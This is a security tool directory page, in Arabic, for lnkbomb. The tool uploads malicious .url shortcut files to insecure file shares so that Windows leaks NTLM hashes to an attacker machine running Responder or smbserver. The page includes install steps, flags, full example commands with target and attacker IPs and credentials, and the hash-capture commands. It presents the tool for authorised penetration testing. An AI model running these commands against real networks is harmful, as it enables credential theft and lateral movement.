Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
lnkbomb — مولد اختصارات خبيث لجمع تجزئات NTLM من مشاركات الملفات غير الآمنة. | Kitploit
أدوات/GitHubGitHub/dievus/lnkbomb
هجمات كلمات المرورالاستغلالالحركة الجانبيةجمع المعلوماتاختبار الاختراقالفريق الأحمرArchived
GitHubdievus/lnkbomb

lnkbomb

مولد اختصارات خبيث لجمع تجزئات NTLM من مشاركات الملفات غير الآمنة.

عرض المستودع
3636218منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Lnkbomb

ko-fi

تُستخدم أداة Lnkbomb لرفع ملفات الاختصار الخبيثة إلى مشاركات الملفات غير الآمنة. توجد الثغرة بسبب قيام Windows بالبحث عن ملف أيقونة لربطه بملف الاختصار. يمكن توجيه ملف الأيقونة هذا إلى جهاز مختبر الاختراق الذي يقوم بتشغيل Responder أو smbserver لجمع تجزئات NTLMv1 أو NTLMv2 (اعتمادًا على تكوين جهاز الضحية). يمكن للمختبر بعد ذلك محاولة كسر هذه التجزئات المجمعة دون اتصال باستخدام أداة مثل Hashcat، أو ترحيلها إلى أداة مثل ntlmrelayx لمزيد من الاستغلال.

يتم رفع ملف الحمولة مباشرة إلى الملف غير الآمن الذي يحدده المختبر في سطر الأوامر. كما يقوم المختبر بتضمين عنوان IP الخاص به، والذي يُكتب في الحمولة.

الإصدار 2.0 هو إعادة بناء كاملة للأداة ويستخدم مكتبة pysmb، مما يسمح بإسقاط الحمولات بدون مصادقة ومعها.

استخدام بايثون

تثبيت Lnkbomb

لاحظ أن المشروع يعمل باستمرار في بيئة Windows. قد يواجه مشكلات في Linux.

git clone https://github.com/dievus/lnkbomb.git

قم بتغيير الدليل إلى lnkbomb وشغل:

python3 lnkbomb.py -h

سيؤدي هذا إلى إظهار قائمة المساعدة، والتي تحتوي على العلامات التالية:

-h, --help - Lists the help options

-t, --target - Specifies the target IP address

-a, --attacker - Specifies the tester's attack machine IP address

-r, --recover - Used to remove the payload when testing is completed (ex. -r payloadname.url)

-w, --windows - New command - required for setting appropriate ports for Windows shares

-l, --linux - New command - required for setting appropriate ports for Linux shares

-n, --netbios - New command - netbios name for targeted Windows machines must be included

أمثلة على الأوامر الكاملة:

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url

ستحتاج إلى استخدام أداة مثل Responder أو smbserver لالتقاط تجزئة NTLM.
responder -I eth0 -dwFP -v

أو

smbserver.py . . -smb2support

ملاحظات

يرجى مراعاة أن هذه الأداة مخصصة لأغراض الاختراق الأخلاقي واختبار الاختراق فقط. لا أؤيد أي سلوك يتضمن اختبار أهداف ليس لديك الإذن باختبارها حاليًا.

قد تعمل هذه الأداة أو لا تعمل اعتمادًا على تصحيحات الهدف وإصداراته. قد تختلف تجربة المستخدم.

أعلم أنها اختصارات .url وليست امتدادات .lnk. أفعل ذلك لإثارة حماستك.

تنزيل الأداة